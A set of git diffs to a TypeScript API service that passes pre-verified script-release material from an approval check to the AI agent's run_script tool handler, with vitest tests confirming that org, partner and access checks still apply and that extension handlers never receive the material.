+// makeHandler) the preToolUse -> executeTool context hand-off (#3409 PR4c-1).
+export const __test__ = { makeSessionAwareHandler, makeHandler };
 
 // ============================================
 // SDK MCP Server Factory

--- a/apps/api/src/services/aiAgentSdkTools.verifiedContext.test.ts
+++ b/apps/api/src/services/aiAgentSdkTools.verifiedContext.test.ts
@@ -1,0 +1,122 @@
+import { describe, it, expect, vi, beforeEach } from 'vitest';
+
+/**
+ * #3409 PR4c-1 — the inline chat release path's carry channel.
+ *
+ * The durable worker verifies the pinned effect digest and calls `executeTool`
+ * a few lines later, so carrying the verified material between the two is
+ * local. The inline path is split: `aiAgentSdk.ts`'s `createSessionPreToolUse`
+ * verifies, and the tool actually runs later from THIS module's `makeHandler`.
+ * The one thing that already crosses that seam is the preToolUse callback's
+ * return value (`intentId` rides it), so the verified material rides it too.
+ *
+ * These tests pin that forwarding, and — just as importantly — pin that a
+ * caller who verified nothing still reaches `executeTool` with exactly three
+ * arguments, which is the compatibility contract for direct chat, MCP and the
+ * script builder.
+ */
+
+const mockExecuteTool = vi.fn(async () => JSON.stringify({ ok: true }));
+
+vi.mock('../db', () => ({
+  runOutsideDbContext: vi.fn((fn: () => unknown) => fn()),
+  withDbAccessContext: vi.fn(async (_ctx: unknown, fn: () => Promise<unknown>) => fn()),
+  withSystemDbAccessContext: vi.fn(async (fn: () => Promise<unknown>) => fn()),
+  db: {},
+}));
+
+vi.mock('./aiAgent', () => ({ waitForPlanApproval: vi.fn() }));
+
+// Identity compaction so the assertions read against the raw handler output.
+vi.mock('./aiToolOutput', () => ({
+  compactToolResultForChat: vi.fn((_tool: string, raw: string) => raw),
+}));
+
+vi.mock('./aiToolsM365', () => ({
+  m365LookupUserHandler: vi.fn(),
+  m365RecentSigninsHandler: vi.fn(),
+  m365ListGroupMembershipsHandler: vi.fn(),
+  m365DisableUserHandler: vi.fn(),
+  m365ResetPasswordHandler: vi.fn(),
+  registerM365Tools: vi.fn(),
+}));
+
+// Only `executeTool` is replaced: the registry (`aiTools`) and every other
+// export stay real, so this file cannot pass against a module that no longer
+// exports what aiAgentSdkTools imports.
+vi.mock('./aiTools', async (importOriginal) => ({
+  ...(await importOriginal<Record<string, unknown>>()),
+  executeTool: (...args: unknown[]) => mockExecuteTool(...(args as [])),
+}));
+
+import { __test__ } from './aiAgentSdkTools';
+import type { ToolExecutionContext } from './toolExecutionContext';
+
+const { makeHandler } = __test__;
+
+const fakeAuth = {
+  scope: 'organization',
+  orgId: 'org-1',
+  accessibleOrgIds: ['org-1'],
+  partnerId: 'partner-1',
+  user: { id: 'user-1' },
+} as any;
+
+/** The carrier a release path builds; only its identity matters here. */
+const verifiedContext = {
+  verifiedRunScript: {
+    snapshot: { script: { id: 'script-1' } },
+    scriptRow: { id: 'script-1' },
+    scope: { orgIds: new Set(['org-1']) },
+  },
+} as unknown as ToolExecutionContext;
+
+describe('makeHandler forwards pre-verified release material to executeTool (#3409 PR4c-1)', () => {
+  beforeEach(() => {
+    vi.clearAllMocks();
+    mockExecuteTool.mockResolvedValue(JSON.stringify({ ok: true }));
+  });
+
+  it('passes the context returned by onPreToolUse through to executeTool', async () => {
+    const onPreToolUse = vi.fn(async () => ({ allowed: true as const, context: verifiedContext }));
+    const handler = makeHandler('run_script', () => fakeAuth, onPreToolUse);
+
+    await handler({ scriptId: 'script-1', deviceIds: ['device-1'] });
+
+    expect(mockExecuteTool).toHaveBeenCalledTimes(1);
+    const call = mockExecuteTool.mock.calls[0]! as unknown as unknown[];
+    expect(call[0]).toBe('run_script');
+    expect(call[2]).toBe(fakeAuth);
+    // Identity: the very object the verification produced, not a copy.
+    expect((call[3] as { context?: unknown }).context).toBe(verifiedContext);
+  });
+
+  it('calls executeTool with exactly three arguments when nothing was verified', async () => {
+    const onPreToolUse = vi.fn(async () => ({ allowed: true as const }));
+    const handler = makeHandler('list_scripts', () => fakeAuth, onPreToolUse);
+
+    await handler({});
+
+    // Not `toHaveBeenCalledWith(a, b, c)` alone — a trailing `undefined`
+    // options bag would still be a behavioural change for every non-release
+    // caller, and only an arity assertion catches it.
+    expect(mockExecuteTool.mock.calls[0]).toHaveLength(3);
+  });
+
+  it('calls executeTool with exactly three arguments when there is no preToolUse callback at all', async () => {
+    const handler = makeHandler('list_scripts', () => fakeAuth);
+
+    await handler({});
+
+    expect(mockExecuteTool.mock.calls[0]).toHaveLength(3);
+  });
+
+  it('never reaches executeTool when onPreToolUse denies, context or not', async () => {
+    const onPreToolUse = vi.fn(async () => ({ allowed: false as const, error: 'approval_required' }));
+    const handler = makeHandler('run_script', () => fakeAuth, onPreToolUse);
+
+    await handler({ scriptId: 'script-1', deviceIds: ['device-1'] });
+
+    expect(mockExecuteTool).not.toHaveBeenCalled();
+  });
+});

--- a/apps/api/src/services/aiTools.executeToolGate.test.ts
+++ b/apps/api/src/services/aiTools.executeToolGate.test.ts
@@ -1,3 +1,4 @@
+import { Hono } from 'hono';
 import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest';
 
 /**
@@ -5,6 +6,10 @@ import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest';
  * MCP, and SDK paths) runs the declarative device gate BEFORE the handler, so a
  * tool declaring `deviceArgs` cannot reach a device outside the caller's scope
  * even if its handler does no checking of its own.
+ *
+ * Second suite below: the same chokepoint carries an explicit
+ * `ToolExecutionContext` from caller to CORE handler, and deliberately does not
+ * carry it to extension-contributed handlers.
  */
 
 vi.mock('../db', () => ({
@@ -24,7 +29,10 @@ vi.mock('./aiToolSchemas', async (orig) => ({
 import { db } from '../db';
 import { aiTools, executeTool } from './aiTools';
 import type { AiTool } from './aiTools';
+import type { ToolExecutionContext } from './toolExecutionContext';
 import type { AuthContext } from '../middleware/auth';
+import { ExtensionContributionRegistry } from '../extensions/contributionRegistry';
+import type { ExtensionAiTool, ExtensionManifestV1 } from '@breeze/extension-sdk';
 
 const PROBE = '__device_gate_probe__';
 const FOREIGN_DEVICE = '99999999-9999-9999-9999-999999999999';
@@ -95,6 +103,183 @@ describe('executeTool runs the declarative device gate before the handler', () =
     );
     const input = { deviceId: OWN_DEVICE, foo: 'bar' };
     await executeTool(PROBE, input, makeAuth()); // makeAuth() has no helperDeviceId
-    expect(handler).toHaveBeenCalledWith(input, expect.anything());
+    // Third argument is the (here omitted) ToolExecutionContext.
+    expect(handler).toHaveBeenCalledWith(input, expect.anything(), undefined);
+  });
+});
+
+// ============================================================================
+// ToolExecutionContext carrier (#3409 PR4c-1)
+// ============================================================================
+
+const CONTEXT_PROBE = '__tool_context_probe__';
+
+/**
+ * A snapshot-shaped fixture. Its contents are irrelevant here — this suite only
+ * proves the CHANNEL: the same object identity the caller handed to
+ * `executeTool` is what the handler receives.
+ */
+const VERIFIED_SNAPSHOT = {
+  script: {
+    id: 'script-1',
+    orgId: 'org-123',
+    language: 'powershell',
+    content: 'Write-Host 1',
+    timeoutSeconds: 300,
+    runAs: 'system',
+  },
+  parameterDefinitions: '[]',
+  deviceOrgIds: ['org-123'],
+  variableReferences: [],
+} satisfies NonNullable<ToolExecutionContext['verifiedRunScript']>;
+
+/**
+ * A handler declared with the FULL three-parameter shape, so the recorded call
+ * arguments stay typed (`mock.calls[0][2]` is the context, not an out-of-range
+ * tuple index).
+ */
+function makeRecordingHandler() {
+  return async (
+    _input: Record<string, unknown>,
+    _auth: AuthContext,
+    _context?: ToolExecutionContext,
+  ) => JSON.stringify({ ok: true });
+}
+
+function registerContextProbe(handlerImpl: AiTool['handler']) {
+  aiTools.set(CONTEXT_PROBE, {
+    tier: 1,
+    definition: {
+      name: CONTEXT_PROBE,
+      description: 'context probe',
+      input_schema: { type: 'object', properties: {} },
+    },
+    handler: handlerImpl,
+  } as AiTool);
+}
+
+function makeExtensionTool(handlerImpl: ExtensionAiTool['handler']): ExtensionAiTool {
+  return {
+    definition: {
+      name: 'context_probe_ext',
+      description: 'extension context probe',
+      input_schema: { type: 'object', properties: {}, additionalProperties: true },
+    },
+    tier: 1,
+    handler: handlerImpl,
+  };
+}
+
+function makeExtensionManifest(): ExtensionManifestV1 {
+  return {
+    apiVersion: 'breeze.extensions/v1',
+    name: 'context-probe-ext',
+    version: '1.0.0',
+    routeNamespace: 'context-probe-ext',
+    requires: {
+      breeze: '>=1.0.0',
+      serverSdk: '^1.0.0',
+      capabilities: ['server.ai-tools.v1'],
+    },
+    server: { entry: 'dist/server.js' },
+    migrationsDir: 'migrations',
+    schemaCompatibilityFloor: '1.0.0',
+    publicRoutes: [],
+    jobs: [],
+    aiTools: [{ name: 'context_probe_ext' }],
+    tenancy: {
+      orgCascadeDeleteTables: [],
+      deviceCascadeDeleteTables: [],
+      deviceOrgDenormalizedTables: [],
+    },
+  };
+}
+
+describe('executeTool carries an explicit ToolExecutionContext', () => {
+  afterEach(() => {
+    aiTools.delete(CONTEXT_PROBE);
+  });
+
+  it('hands the caller-supplied context to the core handler as its third argument', async () => {
+    const contextHandler = vi.fn(makeRecordingHandler());
+    registerContextProbe(contextHandler);
+    const auth = makeAuth();
+    const input = { foo: 'bar' };
+    const context: ToolExecutionContext = { verifiedRunScript: VERIFIED_SNAPSHOT };
+
+    await executeTool(CONTEXT_PROBE, input, auth, undefined, undefined, context);
+
+    expect(contextHandler).toHaveBeenCalledWith(input, auth, context);
+    // Identity, not a structural copy: the release path's verified material must
+    // arrive as the very object it verified.
+    expect(contextHandler.mock.calls[0]?.[2]).toBe(context);
+  });
+
+  it('leaves the third argument undefined when the caller supplies no context', async () => {
+    const contextHandler = vi.fn(makeRecordingHandler());
+    registerContextProbe(contextHandler);
+
+    await executeTool(CONTEXT_PROBE, { foo: 'bar' }, makeAuth());
+
+    expect(contextHandler.mock.calls[0]?.[2]).toBeUndefined();
+  });
+
+  /**
+   * The compatibility proof for the other 188 handlers: a handler DECLARED with
+   * only `(input, auth)` — the pre-existing shape — must keep running unchanged
+   * even when a context is in flight. It reads its two arguments positionally,
+   * so any reordering or retyping of the leading parameters breaks this test.
+   */
+  it('runs a handler declared with only (input, auth), context or not', async () => {
+    const twoArgHandler: AiTool['handler'] = async (input, auth) =>
+      JSON.stringify({ sawInput: input.foo, sawOrg: auth.orgId, arity: 2 });
+    registerContextProbe(twoArgHandler);
+
+    const withContext = JSON.parse(await executeTool(
+      CONTEXT_PROBE,
+      { foo: 'bar' },
+      makeAuth(),
+      undefined,
+      undefined,
+      { verifiedRunScript: VERIFIED_SNAPSHOT },
+    ));
+    const withoutContext = JSON.parse(
+      await executeTool(CONTEXT_PROBE, { foo: 'bar' }, makeAuth()),
+    );
+
+    expect(withContext).toEqual({ sawInput: 'bar', sawOrg: 'org-123', arity: 2 });
+    expect(withoutContext).toEqual(withContext);
+  });
+
+  /**
+   * Pre-verified release material is HOST-internal. An extension handler is
+   * third-party code that may well be written `(input, auth, ...rest)`, so it is
+   * not enough that the type omits a third parameter — the call must physically
+   * pass only two arguments.
+   */
+  it('never hands the context to an extension-contributed handler', async () => {
+    const extensionHandler = vi.fn(
+      async (_input: Record<string, unknown>, _auth: unknown) => 'ext-ok',
+    );
+    const registry = new ExtensionContributionRegistry();
+    const session = registry.begin(makeExtensionManifest());
+    session.registrar.mountRoute(new Hono());
+    session.registrar.registerAiTool(
+      'context_probe_ext',
+      makeExtensionTool(extensionHandler),
+    );
+    registry.activate(session.finish());
+
+    const out = await executeTool(
+      'context_probe_ext',
+      {},
+      makeAuth(),
+      registry,
+      { isEnabled: async () => true },
+      { verifiedRunScript: VERIFIED_SNAPSHOT },
+    );
+
+    expect(out).toBe('ext-ok');
+    expect(extensionHandler.mock.calls[0]).toHaveLength(2);
   });
 });

--- a/apps/api/src/services/aiTools.executeToolGate.test.ts
+++ b/apps/api/src/services/aiTools.executeToolGate.test.ts
@@ -207,7 +207,7 @@ describe('executeTool carries an explicit ToolExecutionContext', () => {
     const input = { foo: 'bar' };
     const context: ToolExecutionContext = { verifiedRunScript: VERIFIED_SNAPSHOT };
 
-    await executeTool(CONTEXT_PROBE, input, auth, undefined, undefined, context);
+    await executeTool(CONTEXT_PROBE, input, auth, { context });
 
     expect(contextHandler).toHaveBeenCalledWith(input, auth, context);
     // Identity, not a structural copy: the release path's verified material must
@@ -239,9 +239,7 @@ describe('executeTool carries an explicit ToolExecutionContext', () => {
       CONTEXT_PROBE,
       { foo: 'bar' },
       makeAuth(),
-      undefined,
-      undefined,
-      { verifiedRunScript: VERIFIED_SNAPSHOT },
+      { context: { verifiedRunScript: VERIFIED_SNAPSHOT } },
     ));
     const withoutContext = JSON.parse(
       await executeTool(CONTEXT_PROBE, { foo: 'bar' }, makeAuth()),
@@ -274,9 +272,11 @@ describe('executeTool carries an explicit ToolExecutionContext', () => {
       'context_probe_ext',
       {},
       makeAuth(),
-      registry,
-      { isEnabled: async () => true },
-      { verifiedRunScript: VERIFIED_SNAPSHOT },
+      {
+        registry,
+        store: { isEnabled: async () => true },
+        context: { verifiedRunScript: VERIFIED_SNAPSHOT },
+      },
     );
 
     expect(out).toBe('ext-ok');

--- a/apps/api/src/services/aiTools.executeToolGate.test.ts
+++ b/apps/api/src/services/aiTools.executeToolGate.test.ts
@@ -115,23 +115,30 @@ describe('executeTool runs the declarative device gate before the handler', () =
 const CONTEXT_PROBE = '__tool_context_probe__';
 
 /**
- * A snapshot-shaped fixture. Its contents are irrelevant here — this suite only
- * proves the CHANNEL: the same object identity the caller handed to
- * `executeTool` is what the handler receives.
+ * A verified-release-shaped fixture: the digest material, the row dispatch
+ * consumes and the resolved scope, as SIBLINGS. Its contents are irrelevant
+ * here — this suite only proves the CHANNEL: the same object identity the
+ * caller handed to `executeTool` is what the handler receives. The `scriptRow`
+ * and `scope` casts stand in for a full `scripts` row and an opaque
+ * `TenantVariableScope`, neither of which this suite has any reason to build.
  */
 const VERIFIED_SNAPSHOT = {
-  script: {
-    id: 'script-1',
-    orgId: 'org-123',
-    language: 'powershell',
-    content: 'Write-Host 1',
-    timeoutSeconds: 300,
-    runAs: 'system',
+  snapshot: {
+    script: {
+      id: 'script-1',
+      orgId: 'org-123',
+      language: 'powershell',
+      content: 'Write-Host 1',
+      timeoutSeconds: 300,
+      runAs: 'system',
+    },
+    parameterDefinitions: '[]',
+    deviceOrgIds: ['org-123'],
+    variableReferences: [],
   },
-  parameterDefinitions: '[]',
-  deviceOrgIds: ['org-123'],
-  variableReferences: [],
-} satisfies NonNullable<ToolExecutionContext['verifiedRunScript']>;
+  scriptRow: { id: 'script-1', orgId: 'org-123' },
+  scope: { orgIds: new Set(['org-123']) },
+} as unknown as NonNullable<ToolExecutionContext['verifiedRunScript']>;
 
 /**
  * A handler declared with the FULL three-parameter shape, so the recorded call

--- a/apps/api/src/services/aiTools.ts
+++ b/apps/api/src/services/aiTools.ts
@@ -97,8 +97,9 @@ export interface AiTool {
   /**
    * `context` carries material a release path already verified against the
    * approval's pinned effect digest (see `toolExecutionContext.ts`). It is
-   * OPTIONAL and trailing, so the 188 handlers declared `(input, auth)` are
-   * unaffected; only a handler that has a re-query worth skipping declares it,
+   * OPTIONAL and trailing, so every handler declared `(input, auth)` — which
+   * is nearly all of them — is unaffected; only a handler that has a re-query
+   * worth skipping declares it,
    * and it must behave identically when it is absent (direct chat, MCP and
    * script-builder callers never supply one).
    *

--- a/apps/api/src/services/aiTools.ts
+++ b/apps/api/src/services/aiTools.ts
@@ -101,6 +101,16 @@ export interface AiTool {
    * unaffected; only a handler that has a re-query worth skipping declares it,
    * and it must behave identically when it is absent (direct chat, MCP and
    * script-builder callers never supply one).
+   *
+   * TRAP — WRAPPERS SILENTLY TRUNCATE IT. A handler produced by a wrapper that
+   * returns `async (input, auth) => …` drops the third argument with NO compile
+   * error, because a two-parameter function is always assignable here. The
+   * `safeHandler` wrappers in `aiToolsBackupVm.ts`, `aiToolsPolicyPrereqs.ts`,
+   * `aiToolsC2C.ts` and `aiToolsConfigPolicy.ts` are all shaped that way. If a
+   * tool registered through one of those ever needs the context, the WRAPPER
+   * must accept and forward a third argument too — widening the inner handler
+   * alone will read `undefined` forever. (No current consumer is wrapped:
+   * `run_script` is a bare inline arrow in `aiToolsScripts.ts`.)
    */
   handler: (
     input: Record<string, unknown>,
@@ -300,12 +310,13 @@ export type AiToolEnabledStore = Pick<ExtensionStateStore, 'isEnabled'>;
 /**
  * The shared, lazily-built store backing the extension AI-tool enable gate.
  *
- * Built once and memoized. Note this is `executeTool`'s DEFAULT PARAMETER, so it
- * is evaluated on every call — core-tool calls included — not only on the first
- * extension-tool call. That is deliberate and cheap: construction is a bare
- * `new` of a store around the shared `db` pool with no I/O, and after the first
- * call it is a memo read. No database work happens until `isEnabled` runs, which
- * only the extension branch of `executeTool` reaches.
+ * Built once and memoized. `executeTool` resolves it as
+ * `opts?.store ?? defaultExtensionEnabledStore()` INSIDE the extension branch,
+ * so a core-tool call never constructs one. (It used to be a default parameter,
+ * which is evaluated on every call — harmless, since construction is a bare
+ * `new` around the shared `db` pool with no I/O and every later call is a memo
+ * read, but pointless on the critical path of every AI tool call.) No database
+ * work happens until `isEnabled` runs, which only that branch reaches.
  */
 let extensionEnabledStore: AiToolEnabledStore | null = null;
 function defaultExtensionEnabledStore(): AiToolEnabledStore {
@@ -438,19 +449,34 @@ export function applyHelperDeviceScope(
   return { input: { ...input, [field]: value } };
 }
 
-export async function executeTool(
-  toolName: string,
-  input: Record<string, unknown>,
-  auth: AuthContext,
-  registry: ExtensionContributionRegistry = extensionContributionRegistry,
-  store: AiToolEnabledStore = defaultExtensionEnabledStore(),
+/**
+ * Everything `executeTool` accepts beyond the three arguments every caller
+ * passes. A NAMED BAG, not trailing positionals: the members are unrelated to
+ * each other, and getting them in the wrong order used to fail SILENTLY — a
+ * context handed to the `registry` slot would break extension tool resolution
+ * and skip the enabled-store gate with no error anywhere. Named members make
+ * that same mistake a compile error.
+ */
+export type ExecuteToolOptions = {
+  /** Extension contribution snapshot to resolve extension-contributed tools from. */
+  registry?: ExtensionContributionRegistry;
+  /** Durable enabled-flag store for the extension gate (injectable for tests). */
+  store?: AiToolEnabledStore;
   /**
    * Pre-verified release material for THIS invocation. Supplied only by a
    * release path that has already checked the approval's pinned effect digest;
    * every other caller omits it and the handler sees `undefined`.
    */
-  context?: ToolExecutionContext,
+  context?: ToolExecutionContext;
+};
+
+export async function executeTool(
+  toolName: string,
+  input: Record<string, unknown>,
+  auth: AuthContext,
+  opts?: ExecuteToolOptions,
 ): Promise<string> {
+  const registry = opts?.registry ?? extensionContributionRegistry;
   const coreTool = aiTools.get(toolName);
   const extensionTool = resolveExtensionTool(toolName, registry);
   const tool = coreTool ?? extensionTool;
@@ -467,6 +493,8 @@ export async function executeTool(
   // unresolvable, the same as a withdrawn one. Core tools never reach this
   // branch, so the core path takes no extra database read.
   if (!coreTool && extensionTool) {
+    // Resolved HERE, not up front: a core-tool call must not construct a store.
+    const store = opts?.store ?? defaultExtensionEnabledStore();
     const owner = registry.findAiToolOwner(toolName);
     if (!owner || !(await store.isEnabled(owner))) {
       throw new Error(`Unknown tool: ${toolName}`);
@@ -502,6 +530,6 @@ export async function executeTool(
   // typed without a third one, since a handler written `(input, auth, ...rest)`
   // or reading `arguments` would otherwise capture pre-verified release
   // material the host never intended to hand out.
-  if (coreTool) return coreTool.handler(effectiveInput, auth, context);
+  if (coreTool) return coreTool.handler(effectiveInput, auth, opts?.context);
   return (tool as RegistryAiTool).handler(effectiveInput, auth);
 }

--- a/apps/api/src/services/aiTools.ts
+++ b/apps/api/src/services/aiTools.ts
@@ -20,6 +20,12 @@ import {
   createExtensionStateStore,
   type ExtensionStateStore,
 } from '../extensions/stateStore';
+// Type-only, deliberately: `toolExecutionContext.ts` names a type from
+// `actionIntents/runScriptSnapshot.ts`, and sibling `actionIntents/*` modules
+// (intentService, revalidateRelease) already import back into this hub. Keeping
+// the edge type-only means it is erased at build time and no import cycle can
+// form.
+import type { ToolExecutionContext } from './toolExecutionContext';
 
 // Pre-existing domain modules
 import { registerAgentLogTools } from './aiToolsAgentLogs';
@@ -88,7 +94,19 @@ export type AiToolTier = 1 | 2 | 3 | 4;
 export interface AiTool {
   definition: Anthropic.Tool;
   tier: AiToolTier;
-  handler: (input: Record<string, unknown>, auth: AuthContext) => Promise<string>;
+  /**
+   * `context` carries material a release path already verified against the
+   * approval's pinned effect digest (see `toolExecutionContext.ts`). It is
+   * OPTIONAL and trailing, so the 188 handlers declared `(input, auth)` are
+   * unaffected; only a handler that has a re-query worth skipping declares it,
+   * and it must behave identically when it is absent (direct chat, MCP and
+   * script-builder callers never supply one).
+   */
+  handler: (
+    input: Record<string, unknown>,
+    auth: AuthContext,
+    context?: ToolExecutionContext,
+  ) => Promise<string>;
   /**
    * Names of the tool's input properties that carry a device id (each a string
    * or string[]). When set, the central dispatch gates every supplied id
@@ -426,6 +444,12 @@ export async function executeTool(
   auth: AuthContext,
   registry: ExtensionContributionRegistry = extensionContributionRegistry,
   store: AiToolEnabledStore = defaultExtensionEnabledStore(),
+  /**
+   * Pre-verified release material for THIS invocation. Supplied only by a
+   * release path that has already checked the approval's pinned effect digest;
+   * every other caller omits it and the handler sees `undefined`.
+   */
+  context?: ToolExecutionContext,
 ): Promise<string> {
   const coreTool = aiTools.get(toolName);
   const extensionTool = resolveExtensionTool(toolName, registry);
@@ -473,5 +497,11 @@ export async function executeTool(
   const gate = await enforceDeviceArgs(tool, effectiveInput, auth);
   if (!gate.ok) return JSON.stringify({ error: gate.error });
 
-  return tool.handler(effectiveInput, auth);
+  // Only CORE handlers receive the execution context. Extension handlers are
+  // third-party code and are called with exactly two arguments — not merely
+  // typed without a third one, since a handler written `(input, auth, ...rest)`
+  // or reading `arguments` would otherwise capture pre-verified release
+  // material the host never intended to hand out.
+  if (coreTool) return coreTool.handler(effectiveInput, auth, context);
+  return (tool as RegistryAiTool).handler(effectiveInput, auth);
 }

--- a/apps/api/src/services/aiToolsScripts.runScript.orgEquality.test.ts
+++ b/apps/api/src/services/aiToolsScripts.runScript.orgEquality.test.ts
@@ -111,6 +111,7 @@ import { devices, organizations, scripts } from '../db/schema';
 import { registerScriptTools } from './aiToolsScripts';
 import { loadTenantVariableScope } from './tenantVariableResolution';
 import type { AiTool } from './aiTools';
+import type { ToolExecutionContext } from './toolExecutionContext';
 import type { AuthContext } from '../middleware/auth';
 
 const ORG_A = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa';
@@ -151,10 +152,19 @@ function makeAuth(): AuthContext {
  * scripts). `orgRow` is only consulted when the handler actually queries
  * organizations.
  */
+/**
+ * Every table `.from()` was called with, in order. Lets a test assert that the
+ * handler did NOT re-read `scripts` (rather than only that it produced the
+ * right answer, which a re-read would also do when the row happens to agree).
+ */
+const selectedTables: unknown[] = [];
+
 function mockDb(scriptRow: any, deviceRow: any, orgRow?: any) {
+  selectedTables.length = 0;
   vi.mocked(db.select).mockImplementation((() => {
     return {
       from: vi.fn((table: unknown) => {
+        selectedTables.push(table);
         let rows: any[];
         if (table === scripts) rows = [scriptRow].filter(Boolean);
         else if (table === devices) rows = [deviceRow].filter(Boolean);
@@ -438,6 +448,187 @@ describe('run_script variable-scope preload gate (#3409 PR3 P1)', () => {
 
     await runScriptTool().handler({ scriptId: SCRIPT_ID, deviceIds: [DEVICE_B] }, makeAuth());
 
+    expect(loadTenantVariableScope).toHaveBeenCalledWith([ORG_B]);
+  });
+});
+
+// #3409 PR4c-1 — the verified release snapshot.
+//
+// A release path (jobs/intentReleaseWorker.ts, or the inline chat path in
+// aiAgentSdk.ts) has already read the script row and resolved the tenant
+// variables in order to recompute the pinned effect digest. Reading them AGAIN
+// here reopens the exact check/use window the digest exists to close, so the
+// verified material is handed in as `ToolExecutionContext.verifiedRunScript`.
+//
+// EVERY test below feeds an EMPTY `scripts` table (`mockDb(null, ...)`). That
+// is deliberate and is what makes them non-vacuous: a handler that re-queries
+// answers "Script not found or has no content" and dispatches nothing, so no
+// assertion here can be satisfied by accident.
+describe('run_script consumes a verified release snapshot instead of re-querying (#3409 PR4c-1)', () => {
+  const OTHER_SCRIPT_ID = '44444444-4444-4444-4444-444444444444';
+  const deviceRow = { id: DEVICE_B, orgId: ORG_B, hostname: 'devB', siteId: null, status: 'online' };
+  const pinnedScope = { orgIds: new Set([ORG_B]) } as any;
+
+  const pinnedRow = (overrides: Record<string, unknown> = {}) => ({
+    id: SCRIPT_ID,
+    orgId: ORG_B,
+    partnerId: null,
+    language: 'powershell',
+    content: 'echo pinned',
+    timeoutSeconds: 60,
+    runAs: 'system',
+    parameters: null,
+    ...overrides,
+  });
+
+  /**
+   * The carrier the release paths build. `snapshot` (digest material),
+   * `scriptRow` (what dispatch consumes) and `scope` (plaintext-bearing) are
+   * SIBLINGS — the scope must never be reachable from the digest material.
+   * Cast because the fixtures are deliberately partial rows.
+   */
+  function contextFor(scriptRow: any, scope: any = pinnedScope): ToolExecutionContext {
+    return {
+      verifiedRunScript: {
+        snapshot: {
+          script: {
+            id: scriptRow.id,
+            orgId: scriptRow.orgId,
+            language: scriptRow.language,
+            content: scriptRow.content,
+            timeoutSeconds: scriptRow.timeoutSeconds,
+            runAs: scriptRow.runAs,
+          },
+          parameterDefinitions: '[]',
+          deviceOrgIds: [ORG_B],
+          variableReferences: [],
+        },
+        scriptRow,
+        scope,
+      },
+    } as unknown as ToolExecutionContext;
+  }
+
+  it('dispatches the pinned row and never re-reads the scripts table', async () => {
+    const pinned = pinnedRow();
+    mockDb(null, deviceRow);
+
+    const out = JSON.parse(
+      await runScriptTool().handler(
+        { scriptId: SCRIPT_ID, deviceIds: [DEVICE_B] },
+        makeAuth(),
+        contextFor(pinned),
+      ),
+    );
+
+    expect(selectedTables).not.toContain(scripts);
+    expect(dispatchScriptToDevice).toHaveBeenCalledWith(
+      expect.objectContaining({ source: { kind: 'saved', script: pinned } }),
+    );
+    expect(out.results[DEVICE_B].status).toBe('completed');
+  });
+
+  it('reuses the pinned variable scope instead of re-resolving it, still nested inside the C1 escape', async () => {
+    // The content carries a {{var.*}} token, so the no-context path WOULD call
+    // loadTenantVariableScope — without the token this would assert nothing.
+    const pinned = pinnedRow({ content: 'curl {{var.repo_url}}' });
+    mockDb(null, deviceRow);
+
+    await runScriptTool().handler(
+      { scriptId: SCRIPT_ID, deviceIds: [DEVICE_B] },
+      makeAuth(),
+      contextFor(pinned),
+    );
+
+    expect(loadTenantVariableScope).not.toHaveBeenCalled();
+    expect(dispatchScriptToDevice).toHaveBeenCalledWith(
+      expect.objectContaining({ variableScope: pinnedScope }),
+    );
+    // Skipping the preload must not have unpicked the escape nesting dispatch
+    // itself depends on (#3409 C1).
+    const dispatchReturn = await dispatchScriptToDevice.mock.results[0]!.value;
+    expect(dispatchReturn.__calledUnder).toEqual({ runOutside: true, system: true });
+  });
+
+  it('still rejects a pinned org-A script on an org-B device — the snapshot removes a READ, not a CHECK', async () => {
+    mockDb(null, deviceRow);
+
+    const out = JSON.parse(
+      await runScriptTool().handler(
+        { scriptId: SCRIPT_ID, deviceIds: [DEVICE_B] },
+        makeAuth(),
+        contextFor(pinnedRow({ orgId: ORG_A })),
+      ),
+    );
+
+    expect(dispatchScriptToDevice).not.toHaveBeenCalled();
+    expect(out.results[DEVICE_B].error).toMatch(/not found or access denied/i);
+  });
+
+  it('still enforces the partner guard for a pinned partner-wide script', async () => {
+    mockDb(null, deviceRow, { partnerId: PARTNER_2 });
+
+    const out = JSON.parse(
+      await runScriptTool().handler(
+        { scriptId: SCRIPT_ID, deviceIds: [DEVICE_B] },
+        makeAuth(),
+        contextFor(pinnedRow({ orgId: null, partnerId: PARTNER_1 })),
+      ),
+    );
+
+    // The device-org -> partner lookup must actually have run.
+    expect(selectedTables).toContain(organizations);
+    expect(dispatchScriptToDevice).not.toHaveBeenCalled();
+    expect(out.results[DEVICE_B].error).toMatch(/not found or access denied/i);
+  });
+
+  it('refuses a pinned script whose org the caller cannot access', async () => {
+    // The skipped query carried `or(isNull(orgId), auth.orgCondition(orgId))`.
+    // That filter is AUTHORIZATION and has to survive as an in-code check —
+    // the release path resolves the row under a SYSTEM context with no org
+    // filter at all, so dropping it would let a caller run a script from an
+    // org they cannot reach.
+    const auth = makeAuth();
+    auth.canAccessOrg = () => false;
+    mockDb(null, deviceRow);
+
+    const out = JSON.parse(
+      await runScriptTool().handler(
+        { scriptId: SCRIPT_ID, deviceIds: [DEVICE_B] },
+        auth,
+        contextFor(pinnedRow({ orgId: ORG_A })),
+      ),
+    );
+
+    expect(out.error).toMatch(/not found/i);
+    expect(dispatchScriptToDevice).not.toHaveBeenCalled();
+    // And it must NOT quietly fall back to the query to try again.
+    expect(selectedTables).not.toContain(scripts);
+  });
+
+  it('ignores a context pinned to a DIFFERENT script and falls back to the query', async () => {
+    const queried = pinnedRow({ content: 'echo queried' });
+    mockDb(queried, deviceRow);
+
+    await runScriptTool().handler(
+      { scriptId: SCRIPT_ID, deviceIds: [DEVICE_B] },
+      makeAuth(),
+      contextFor(pinnedRow({ id: OTHER_SCRIPT_ID })),
+    );
+
+    expect(selectedTables).toContain(scripts);
+    expect(dispatchScriptToDevice).toHaveBeenCalledWith(
+      expect.objectContaining({ source: { kind: 'saved', script: queried } }),
+    );
+  });
+
+  it('with NO context, reads the script row and resolves the scope exactly as before', async () => {
+    const queried = pinnedRow({ content: 'curl {{var.repo_url}}' });
+    mockDb(queried, deviceRow);
+
+    await runScriptTool().handler({ scriptId: SCRIPT_ID, deviceIds: [DEVICE_B] }, makeAuth());
+
+    expect(selectedTables).toContain(scripts);
     expect(loadTenantVariableScope).toHaveBeenCalledWith([ORG_B]);
   });
 });

--- a/apps/api/src/services/aiToolsScripts.runScript.orgEquality.test.ts
+++ b/apps/api/src/services/aiToolsScripts.runScript.orgEquality.test.ts
